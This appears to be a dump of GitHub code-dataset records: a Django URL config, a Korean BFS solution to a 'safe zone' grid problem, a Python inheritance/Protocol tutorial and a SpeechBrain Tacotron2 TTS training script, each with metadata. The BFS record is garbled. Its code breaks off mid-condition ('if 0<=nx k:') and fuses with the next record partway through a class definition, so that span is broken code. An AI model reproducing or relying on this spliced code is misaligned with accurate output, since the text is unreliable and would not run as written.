self._time.parse(upgrade['date'])\n return self._time.now()\n", "repo_name": "sabeechen/hassio-google-drive-backup", "sub_path": "hassio-google-drive-backup/backup/util/data_cache.py", "file_name": "data_cache.py", "file_ext": "py", "file_size_in_byte": 5085, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2613, "dataset": "github-code", "pt": "52", "api": [{"api_name": "backup.config.Version.parse", "line_number": 25, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 25, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 29, "usage_type": "name"}, {"api_name": "enum.unique", "line_number": 28, "usage_type": "name"}, {"api_name": "backup.config.Config", "line_number": 39, "usage_type": "name"}, {"api_name": "time.Time", "line_number": 39, "usage_type": "name"}, {"api_name": "backup.config.Version.default", "line_number": 44, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 44, "usage_type": "name"}, {"api_name": "backup.config.Version.default", "line_number": 45, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 45, "usage_type": "name"}, {"api_name": "injector.inject", "line_number": 38, "usage_type": "name"}, {"api_name": "backup.config.Setting.DATA_CACHE_FILE_PATH", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 50, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 51, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 52, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.read", "line_number": 54, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 54, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 58, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 58, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 73, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 73, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_OTHER_BACKUPS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 75, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_UPGRADE_BACKUPS", "line_number": 75, "usage_type": "attribute"}, {"api_name": "backup.config.Setting.DATA_CACHE_FILE_PATH", "line_number": 86, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 86, "usage_type": "name"}, {"api_name": "backup.file.JsonFileSaver.write", "line_number": 87, "usage_type": "call"}, {"api_name": "backup.file.JsonFileSaver", "line_number": 87, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 99, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 100, "usage_type": "name"}, {"api_name": "backup.const.NECESSARY_OLD_BACKUP_PLURAL_NAME", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 103, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 113, "usage_type": "call"}, {"api_name": "backup.config.Version.parse", "line_number": 127, "usage_type": "call"}, {"api_name": "backup.config.VERSION", "line_number": 127, 
"usage_type": "argument"}, {"api_name": "backup.config.Version", "line_number": 127, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_OTHER_BACKUPS", "line_number": 131, "usage_type": "attribute"}, {"api_name": "backup.config.Setting", "line_number": 131, "usage_type": "name"}, {"api_name": "backup.config.Setting.IGNORE_UPGRADE_BACKUPS", "line_number": 131, "usage_type": "attribute"}, {"api_name": "backup.config.Version", "line_number": 145, "usage_type": "name"}, {"api_name": "backup.config.Version.parse", "line_number": 147, "usage_type": "call"}, {"api_name": "backup.config.Version", "line_number": 147, "usage_type": "name"}, {"api_name": "injector.singleton", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "36317677930", "text": "from django.urls import path, include\nfrom .views import *\nfrom django.contrib.auth import views as auth_views\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('', index, name='index'),\n path('about/', about, name='about'),\n path('register', register, name='register'),\n path('login/', auth_views.LoginView.as_view(template_name='login.html'), name='login'),\n path('/', auth_views.LogoutView.as_view(template_name='logout.html'), name='logout'),\n path('profile/', profile, name='profile'),\n path('profile/work', profile_work, name='profile_work'),\n path('profile/new', profile_new, name='profile_new'),\n path('profile/done', profile_done, name='profile_done'),\n path('profile/create/', create, name='create'),\n path('profile/delete/', delete, name='delete'),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "danyaus777/django", "sub_path": "main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 917, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, 
"usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "5875692880", "text": "# 2468 - 안전영역\nfrom collections import deque\nimport sys\nn = int(input())\n\n# 초기 리스트 입력\narray = []\nmax_value = -1e9\nfor _ in range(n):\n element = list(map(int, input().split()))\n array.append(element)\n max_value = max(max_value, max(element))\n\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\n\ndef bfs(x,y,k, visited):\n queue = deque([(x,y)])\n\n while queue:\n x, y = queue.popleft()\n visited[x][y] = True\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0<=nx k:\n queue.append((nx,ny))\n visited[nx][ny] = True\n # x, y = nx, ny\n\nresult = 0\nfor k in range(max_value):\n visited = [[False] * n for _ in range(n)]\n cnt = 0\n for i in range(n):\n for j in range(n):\n if visited[i][j] == False and array[i][j] > k:\n bfs(i,j,k, visited)\n cnt+=1\n\n if result float:\n ...\n\n\nclass Employee(IEmployee):\n def __init__(self, id, name):\n self.id = id\n self.name = name\n\n\n# class Employee(ABC):\n# def __init__(self, id, name):\n# self.id = id\n# self.name = name\n\n# @abstractmethod\n# def calculate_payroll(self):\n# pass\n\n\nclass PayrollSystem:\n def calculate_payroll(self, employees: Iterable[IEmployee]):\n print(\"Calculating Payroll\")\n print(\"===================\")\n for employee in employees:\n print(f\"Payroll for: {employee.id} - {employee.name}\")\n print(f\"- Check amount: {employee.calculate_payroll()}\")\n print(\"\")\n\n\nclass SalaryEmployee(Employee):\n def __init__(self, id, name, weekly_salary):\n super().__init__(id, name)\n self.weekly_salary = weekly_salary\n\n def calculate_payroll(self):\n return self.weekly_salary\n\n\nclass HourlyEmployee(Employee):\n def __init__(self, id, name, hours_worked, hour_rate):\n super().__init__(id, name)\n self.hours_worked = hours_worked\n self.hour_rate = hour_rate\n\n def calculate_payroll(self):\n return self.hours_worked * self.hour_rate\n\n\nclass CommissionEmployee(SalaryEmployee):\n def __init__(self, id, name, weekly_salary, commission):\n super().__init__(id, name, weekly_salary)\n self.commission = commission\n\n def calculate_payroll(self):\n fixed = super().calculate_payroll()\n return fixed + self.commission\n\n\n## Part 2\n\n\nclass Manager(SalaryEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours.\")\n\n\nclass Secretary(SalaryEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours doing office paperwork.\")\n\n\nclass SalesPerson(CommissionEmployee):\n def work(self, hours):\n print(f\"{self.name} expends {hours} hours on the phone.\")\n\n\nclass FactoryWorker(HourlyEmployee):\n def work(self, hours):\n print(f\"{self.name} manufactures gadgets for {hours} hours.\")\n\n\nclass ProductivitySystem:\n def track(self, employees, hours):\n print(\"Tracking Employee Productivity\")\n print(\"==============================\")\n for employee in employees:\n employee.work(hours)\n print(\"\")\n\n\nif __name__ == \"__main__\":\n\n salary_employee: IEmployee = SalaryEmployee(1, \"John Smith\", 1500)\n hourly_employee: IEmployee = HourlyEmployee(2, \"Jane Doe\", 40, 15)\n commission_employee: IEmployee = CommissionEmployee(3, \"Kevin Bacon\", 1000, 250)\n\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll(\n [\n salary_employee,\n hourly_employee,\n commission_employee,\n ]\n )\n\n ### Part 2\n\n manager = Manager(1, \"Mary Poppins\", 3000)\n secretary = Secretary(2, \"John Smith\", 1500)\n sales_guy 
= SalesPerson(3, \"Kevin Bacon\", 1000, 250)\n factory_worker = FactoryWorker(2, \"Jane Doe\", 40, 15)\n employees = [\n manager,\n secretary,\n sales_guy,\n factory_worker,\n ]\n productivity_system = ProductivitySystem()\n productivity_system.track(employees, 40)\n payroll_system = PayrollSystem()\n payroll_system.calculate_payroll(employees)\n", "repo_name": "aerosadegh/AdvancedPythonTopics", "sub_path": "topics/01-class/04.1.2-inheritance.py", "file_name": "04.1.2-inheritance.py", "file_ext": "py", "file_size_in_byte": 3362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Protocol", "line_number": 4, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "12036904024", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n Recipe for training the Zero-Shot Multi-Speaker Tacotron Text-To-Speech model, an end-to-end\n neural text-to-speech (TTS) system\n\n To run this recipe, do the following:\n # python train.py --device=cuda:0 --max_grad_norm=1.0 --data_folder=/path_to_data_folder hparams/train.yaml\n\n Authors\n * Georges Abous-Rjeili 2021\n * Artem Ploujnikov 2021\n * Yingzhi Wang 2022\n * Pradnya Kandarkar 2023\n\"\"\"\nimport torch\nimport speechbrain as sb\nimport sys\nimport logging\nfrom hyperpyyaml import load_hyperpyyaml\nfrom speechbrain.utils.text_to_sequence import text_to_sequence\nfrom speechbrain.utils.data_utils import scalarize\nimport os\nfrom speechbrain.pretrained import HIFIGAN\nimport torchaudio\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\nlogger = logging.getLogger(__name__)\n\n\nclass Tacotron2Brain(sb.Brain):\n \"\"\"The Brain implementation for Tacotron2\"\"\"\n\n def on_fit_start(self):\n \"\"\"Gets called at the beginning of ``fit()``, on multiple processes\n if ``distributed_count > 0`` and backend is ddp and initializes statistics\"\"\"\n self.hparams.progress_sample_logger.reset()\n self.last_epoch = 0\n self.last_batch = None\n self.last_preds = None\n\n # Instantiate a vocoder if audio samples should be logged\n if self.hparams.log_audio_samples:\n self.vocoder = HIFIGAN.from_hparams(\n source=self.hparams.vocoder,\n savedir=self.hparams.vocoder_savedir,\n run_opts={\"device\": self.device},\n freeze_params=True,\n )\n\n self.last_loss_stats = {}\n return super().on_fit_start()\n\n def compute_forward(self, batch, stage):\n \"\"\"Computes the forward pass\n\n Arguments\n ---------\n batch: str\n a single batch\n stage: speechbrain.Stage\n the training stage\n\n Returns\n -------\n the model output\n \"\"\"\n effective_batch = self.batch_to_device(batch)\n inputs, y, num_items, _, _, spk_embs, spk_ids = effective_batch\n\n _, input_lengths, _, _, _ = inputs\n\n max_input_length = input_lengths.max().item()\n\n return self.modules.model(\n inputs, spk_embs, alignments_dim=max_input_length\n )\n\n def fit_batch(self, batch):\n \"\"\"Fits a single batch and applies annealing\n\n Arguments\n ---------\n batch: tuple\n a training batch\n\n Returns\n -------\n loss: torch.Tensor\n detached loss\n \"\"\"\n result = super().fit_batch(batch)\n self.hparams.lr_annealing(self.optimizer)\n return result\n\n def compute_objectives(self, predictions, batch, stage):\n \"\"\"Computes the loss given the predicted and targeted outputs\n\n Arguments\n ---------\n predictions : torch.Tensor\n The model generated mel-spectrograms and other metrics from `compute_forward`\n batch : PaddedBatch\n This batch object contains all the 
relevant tensors for computation\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, or sb.Stage.TEST\n\n Returns\n -------\n loss : torch.Tensor\n A one-element tensor used for backpropagating the gradient\n \"\"\"\n effective_batch = self.batch_to_device(batch)\n # Hold on to the batch for the inference sample.\n # This is needed because the infernece sample is run from on_stage_end only,\n # where batch information is not available\n self.last_batch = effective_batch\n self.last_preds = predictions\n # Hold on to a sample (for logging)\n self._remember_sample(effective_batch, predictions)\n # Compute the loss\n loss = self._compute_loss(predictions, effective_batch, stage)\n return loss\n\n def _compute_loss(self, predictions, batch, stage):\n \"\"\"Computes the value of the loss function and updates stats\n\n Arguments\n ---------\n predictions: tuple\n model predictions\n batch : PaddedBatch\n This batch object contains all the relevant tensors for computation\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, or sb.Stage.TEST\n\n Returns\n -------\n loss: torch.Tensor\n the loss value\n \"\"\"\n inputs, targets, num_items, labels, wavs, spk_embs, spk_ids = batch\n text_padded, input_lengths, _, max_len, output_lengths = inputs\n\n # Speaker embedding input to compute speaker consistency loss - WIP\n spk_emb_input = None\n\n loss_stats = self.hparams.criterion(\n predictions,\n targets,\n input_lengths,\n output_lengths,\n spk_emb_input,\n self.last_epoch,\n )\n self.last_loss_stats[stage] = scalarize(loss_stats)\n return loss_stats.loss\n\n def _remember_sample(self, batch, predictions):\n \"\"\"Remembers samples of spectrograms and the batch for logging purposes\n\n Arguments\n ---------\n batch: tuple\n a training batch\n predictions: tuple\n predictions (raw output of the Tacotron model)\n \"\"\"\n inputs, targets, num_items, labels, wavs, spk_embs, spk_ids = batch\n text_padded, input_lengths, _, max_len, output_lengths = inputs\n mel_target, _ = targets\n (\n mel_out,\n mel_out_postnet,\n gate_out,\n alignments,\n pred_mel_lengths,\n ) = predictions\n alignments_max = (\n alignments[0]\n .max(dim=-1)\n .values.max(dim=-1)\n .values.unsqueeze(-1)\n .unsqueeze(-1)\n )\n alignments_output = alignments[0].T.flip(dims=(1,)) / alignments_max\n self.hparams.progress_sample_logger.remember(\n target=self._get_spectrogram_sample(mel_target),\n output=self._get_spectrogram_sample(mel_out),\n output_postnet=self._get_spectrogram_sample(mel_out_postnet),\n alignments=alignments_output,\n raw_batch=self.hparams.progress_sample_logger.get_batch_sample(\n {\n \"text_padded\": text_padded,\n \"input_lengths\": input_lengths,\n \"mel_target\": mel_target,\n \"mel_out\": mel_out,\n \"mel_out_postnet\": mel_out_postnet,\n \"max_len\": max_len,\n \"output_lengths\": output_lengths,\n \"gate_out\": gate_out,\n \"alignments\": alignments,\n \"labels\": labels,\n \"wavs\": wavs,\n \"spk_embs\": spk_embs,\n \"spk_ids\": spk_ids,\n }\n ),\n )\n\n def batch_to_device(self, batch):\n \"\"\"Transfers the batch to the target device\n\n Arguments\n ---------\n batch: tuple\n the batch to use\n\n Returns\n -------\n batch: tuple\n the batch on the correct device\n \"\"\"\n (\n text_padded,\n input_lengths,\n mel_padded,\n gate_padded,\n output_lengths,\n len_x,\n labels,\n wavs,\n spk_embs,\n spk_ids,\n ) = batch\n text_padded = text_padded.to(self.device, non_blocking=True).long()\n input_lengths = input_lengths.to(self.device, non_blocking=True).long()\n max_len = 
torch.max(input_lengths.data).item()\n mel_padded = mel_padded.to(self.device, non_blocking=True).float()\n gate_padded = gate_padded.to(self.device, non_blocking=True).float()\n\n output_lengths = output_lengths.to(\n self.device, non_blocking=True\n ).long()\n x = (text_padded, input_lengths, mel_padded, max_len, output_lengths)\n y = (mel_padded, gate_padded)\n len_x = torch.sum(output_lengths)\n spk_embs = spk_embs.to(self.device, non_blocking=True).float()\n return (x, y, len_x, labels, wavs, spk_embs, spk_ids)\n\n def _get_spectrogram_sample(self, raw):\n \"\"\"Converts a raw spectrogram to one that can be saved as an image\n sample = sqrt(exp(raw))\n\n Arguments\n ---------\n raw: torch.Tensor\n the raw spectrogram (as used in the model)\n\n Returns\n -------\n sample: torch.Tensor\n the spectrogram, for image saving purposes\n \"\"\"\n sample = raw[0]\n return torch.sqrt(torch.exp(sample))\n\n def on_stage_end(self, stage, stage_loss, epoch):\n \"\"\"Gets called at the end of an epoch\n\n Arguments\n ---------\n stage : sb.Stage\n One of sb.Stage.TRAIN, sb.Stage.VALID, sb.Stage.TEST\n stage_loss : float\n The average loss for all of the data processed in this stage.\n epoch : int\n The currently-starting epoch. This is passed\n `None` during the test stage.\n \"\"\"\n\n # Logs training samples every 10 epochs\n if stage == sb.Stage.TRAIN and (\n self.hparams.epoch_counter.current % 10 == 0\n ):\n if self.last_batch is None:\n return\n\n train_sample_path = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n )\n if not os.path.exists(train_sample_path):\n os.makedirs(train_sample_path)\n\n _, targets, _, labels, wavs, spk_embs, spk_ids = self.last_batch\n\n train_sample_text = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_input_text.txt\",\n )\n with open(train_sample_text, \"w\") as f:\n f.write(labels[0])\n\n train_input_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_input_audio.wav\",\n )\n torchaudio.save(\n train_input_audio,\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n\n _, mel_out_postnet, _, _, pred_mel_lengths = self.last_preds\n\n if self.hparams.log_audio_samples:\n waveform_ss = self.vocoder.decode_batch(mel_out_postnet[0])\n train_sample_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"train_output_audio.wav\",\n )\n torchaudio.save(\n train_sample_audio,\n waveform_ss.squeeze(1).cpu(),\n self.hparams.sample_rate,\n )\n\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_audio(\n f\"{stage}/train_audio_target\",\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n if self.hparams.log_audio_samples:\n self.tensorboard_logger.log_audio(\n f\"{stage}/train_audio_pred\",\n waveform_ss.squeeze(1),\n self.hparams.sample_rate,\n )\n try:\n self.tensorboard_logger.log_figure(\n f\"{stage}/train_mel_target\", targets[0][0]\n )\n self.tensorboard_logger.log_figure(\n f\"{stage}/train_mel_pred\", mel_out_postnet[0]\n )\n except Exception:\n # This is to avoid the code from crashing in case of a mel-spectrogram with one frame\n pass\n\n # At the end of validation, we can write\n if stage == sb.Stage.VALID:\n # Update learning rate\n lr = self.optimizer.param_groups[-1][\"lr\"]\n self.last_epoch = epoch\n\n # The train_logger writes a summary to stdout and to the logfile.\n 
self.hparams.train_logger.log_stats(\n stats_meta={\"Epoch\": epoch, \"lr\": lr},\n train_stats=self.last_loss_stats[sb.Stage.TRAIN],\n valid_stats=self.last_loss_stats[sb.Stage.VALID],\n )\n\n # The tensorboard_logger writes the same summary to Tensorboard.\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_stats(\n stats_meta={\"Epoch\": epoch, \"lr\": lr},\n train_stats=self.last_loss_stats[sb.Stage.TRAIN],\n valid_stats=self.last_loss_stats[sb.Stage.VALID],\n )\n\n # Save the current checkpoint and delete previous checkpoints.\n epoch_metadata = {\n **{\"epoch\": epoch},\n **self.last_loss_stats[sb.Stage.VALID],\n }\n self.checkpointer.save_and_keep_only(\n meta=epoch_metadata,\n min_keys=[\"loss\"],\n ckpt_predicate=(\n lambda ckpt: (\n ckpt.meta[\"epoch\"]\n % self.hparams.keep_checkpoint_interval\n != 0\n )\n )\n if self.hparams.keep_checkpoint_interval is not None\n else None,\n )\n output_progress_sample = (\n self.hparams.progress_samples\n and epoch % self.hparams.progress_samples_interval == 0\n )\n if output_progress_sample:\n self.run_inference_sample(sb.Stage.VALID)\n self.hparams.progress_sample_logger.save(epoch)\n\n # We also write statistics about test data to stdout and to the logfile.\n if stage == sb.Stage.TEST:\n self.hparams.train_logger.log_stats(\n {\"Epoch loaded\": self.hparams.epoch_counter.current},\n test_stats=self.last_loss_stats[sb.Stage.TEST],\n )\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_stats(\n {\"Epoch loaded\": self.hparams.epoch_counter.current},\n test_stats=self.last_loss_stats[sb.Stage.TEST],\n )\n if self.hparams.progress_samples:\n self.run_inference_sample(sb.Stage.TEST)\n self.hparams.progress_sample_logger.save(\"test\")\n\n def run_inference_sample(self, stage):\n \"\"\"Produces a sample in inference mode. 
This is called when producing\n progress samples; it reuses the last batch seen during training.\"\"\"\n\n if self.last_batch is None:\n return\n inputs, targets, _, labels, wavs, spk_embs, spk_ids = self.last_batch\n text_padded, input_lengths, _, _, _ = inputs\n\n mel_out, _, _ = self.hparams.model.infer(\n text_padded[:1], spk_embs[:1], input_lengths[:1]\n )\n self.hparams.progress_sample_logger.remember(\n inference_mel_out=self._get_spectrogram_sample(mel_out)\n )\n\n if stage == sb.Stage.VALID:\n inf_sample_path = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n )\n\n if not os.path.exists(inf_sample_path):\n os.makedirs(inf_sample_path)\n\n inf_sample_text = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_input_text.txt\",\n )\n with open(inf_sample_text, \"w\") as f:\n f.write(labels[0])\n\n inf_input_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_input_audio.wav\",\n )\n torchaudio.save(\n inf_input_audio,\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n\n if self.hparams.log_audio_samples:\n waveform_ss = self.vocoder.decode_batch(mel_out)\n inf_sample_audio = os.path.join(\n self.hparams.progress_sample_path,\n str(self.hparams.epoch_counter.current),\n \"inf_output_audio.wav\",\n )\n torchaudio.save(\n inf_sample_audio,\n waveform_ss.squeeze(1).cpu(),\n self.hparams.sample_rate,\n )\n\n if self.hparams.use_tensorboard:\n self.tensorboard_logger.log_audio(\n f\"{stage}/inf_audio_target\",\n sb.dataio.dataio.read_audio(wavs[0]).unsqueeze(0),\n self.hparams.sample_rate,\n )\n if self.hparams.log_audio_samples:\n self.tensorboard_logger.log_audio(\n f\"{stage}/inf_audio_pred\",\n waveform_ss.squeeze(1),\n self.hparams.sample_rate,\n )\n try:\n self.tensorboard_logger.log_figure(\n f\"{stage}/inf_mel_target\", targets[0][0]\n )\n self.tensorboard_logger.log_figure(\n f\"{stage}/inf_mel_pred\", mel_out\n )\n except Exception:\n # This is to avoid the code from crashing in case of a mel-spectrogram with one frame\n pass\n\n\ndef dataio_prepare(hparams):\n # Define audio pipeline:\n\n @sb.utils.data_pipeline.takes(\"wav\", \"label_phoneme\")\n @sb.utils.data_pipeline.provides(\"mel_text_pair\")\n def audio_pipeline(wav, label_phoneme):\n\n label_phoneme = \"{\" + label_phoneme + \"}\"\n\n text_seq = torch.IntTensor(\n text_to_sequence(label_phoneme, hparams[\"text_cleaners\"])\n )\n\n audio, sig_sr = torchaudio.load(wav)\n if sig_sr != hparams[\"sample_rate\"]:\n audio = torchaudio.functional.resample(\n audio, sig_sr, hparams[\"sample_rate\"]\n )\n\n mel = hparams[\"mel_spectogram\"](audio=audio.squeeze())\n\n len_text = len(text_seq)\n\n return text_seq, mel, len_text\n\n datasets = {}\n data_info = {\n \"train\": hparams[\"train_json\"],\n \"valid\": hparams[\"valid_json\"],\n \"test\": hparams[\"test_json\"],\n }\n for dataset in hparams[\"splits\"]:\n datasets[dataset] = sb.dataio.dataset.DynamicItemDataset.from_json(\n json_path=data_info[dataset],\n replacements={\"data_root\": hparams[\"data_folder\"]},\n dynamic_items=[audio_pipeline],\n output_keys=[\"mel_text_pair\", \"wav\", \"label\", \"uttid\"],\n )\n\n return datasets\n\n\nif __name__ == \"__main__\":\n\n # Load hyperparameters file with command-line overrides\n hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:])\n\n with open(hparams_file) as fin:\n hparams = load_hyperpyyaml(fin, overrides)\n\n # If --distributed_launch then\n # 
create ddp_group with the right communication protocol\n sb.utils.distributed.ddp_init_group(run_opts)\n\n # Create experiment directory\n sb.create_experiment_directory(\n experiment_directory=hparams[\"output_folder\"],\n hyperparams_to_save=hparams_file,\n overrides=overrides,\n )\n\n # Prepare data\n if not hparams[\"skip_prep\"]:\n sys.path.append(\"../../\")\n from libritts_prepare import prepare_libritts\n\n sb.utils.distributed.run_on_main(\n prepare_libritts,\n kwargs={\n \"data_folder\": hparams[\"data_folder\"],\n \"save_json_train\": hparams[\"train_json\"],\n \"save_json_valid\": hparams[\"valid_json\"],\n \"save_json_test\": hparams[\"test_json\"],\n \"sample_rate\": hparams[\"sample_rate\"],\n \"train_split\": hparams[\"train_split\"],\n \"valid_split\": hparams[\"valid_split\"],\n \"test_split\": hparams[\"test_split\"],\n \"seed\": hparams[\"seed\"],\n \"model_name\": hparams[\"model\"].__class__.__name__,\n },\n )\n\n from compute_speaker_embeddings import compute_speaker_embeddings\n\n sb.utils.distributed.run_on_main(\n compute_speaker_embeddings,\n kwargs={\n \"input_filepaths\": [\n hparams[\"train_json\"],\n hparams[\"valid_json\"],\n hparams[\"test_json\"],\n ],\n \"output_file_paths\": [\n hparams[\"train_speaker_embeddings_pickle\"],\n hparams[\"valid_speaker_embeddings_pickle\"],\n hparams[\"test_speaker_embeddings_pickle\"],\n ],\n \"data_folder\": hparams[\"data_folder\"],\n \"spk_emb_encoder_path\": hparams[\"spk_emb_encoder\"],\n \"spk_emb_sr\": hparams[\"spk_emb_sample_rate\"],\n \"mel_spec_params\": {\n \"custom_mel_spec_encoder\": hparams[\"custom_mel_spec_encoder\"],\n \"sample_rate\": hparams[\"spk_emb_sample_rate\"],\n \"hop_length\": hparams[\"hop_length\"],\n \"win_length\": hparams[\"win_length\"],\n \"n_mel_channels\": hparams[\"n_mel_channels\"],\n \"n_fft\": hparams[\"n_fft\"],\n \"mel_fmin\": hparams[\"mel_fmin\"],\n \"mel_fmax\": hparams[\"mel_fmax\"],\n \"mel_normalized\": hparams[\"mel_normalized\"],\n \"power\": hparams[\"power\"],\n \"norm\": hparams[\"norm\"],\n \"mel_scale\": hparams[\"mel_scale\"],\n \"dynamic_range_compression\": hparams[\n \"dynamic_range_compression\"\n ],\n },\n \"device\": run_opts[\"device\"],\n },\n )\n\n datasets = dataio_prepare(hparams)\n\n # Brain class initialization\n tacotron2_brain = Tacotron2Brain(\n modules=hparams[\"modules\"],\n opt_class=hparams[\"opt_class\"],\n hparams=hparams,\n run_opts=run_opts,\n checkpointer=hparams[\"checkpointer\"],\n )\n\n # Load pretrained model if pretrained_separator is present in the yaml\n if \"pretrained_separator\" in hparams:\n sb.utils.distributed.run_on_main(\n hparams[\"pretrained_separator\"].collect_files\n )\n hparams[\"pretrained_separator\"].load_collected(\n device=run_opts[\"device\"]\n )\n\n if hparams[\"use_tensorboard\"]:\n tacotron2_brain.tensorboard_logger = sb.utils.train_logger.TensorboardLogger(\n save_dir=hparams[\"output_folder\"] + \"/tensorboard\"\n )\n\n # Training\n tacotron2_brain.fit(\n tacotron2_brain.hparams.epoch_counter,\n train_set=datasets[\"train\"],\n valid_set=datasets[\"valid\"],\n train_loader_kwargs=hparams[\"train_dataloader_opts\"],\n valid_loader_kwargs=hparams[\"valid_dataloader_opts\"],\n )\n\n # Test\n if \"test\" in datasets:\n tacotron2_brain.evaluate(\n datasets[\"test\"],\n test_loader_kwargs=hparams[\"test_dataloader_opts\"],\n )\n", "repo_name": "speechbrain/speechbrain", "sub_path": "recipes/LibriTTS/TTS/mstacotron2/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 23407, "program_lang": 
"python", "lang": "en", "doc_type": "code", "stars": 6855, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "speechbrain.Brain", "line_number": 30, "usage_type": "attribute"}, {"api_name": "speechbrain.pretrained.HIFIGAN.from_hparams", "line_number": 43, "usage_type": "call"}, {"api_name": "speechbrain.pretrained.HIFIGAN", "line_number": 43, "usage_type": "name"}, {"api_name": "speechbrain.utils.data_utils.scalarize", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 265, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 265, "usage_type": "call"}, {"api_name": "speechbrain.Stage", "line_number": 282, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 288, 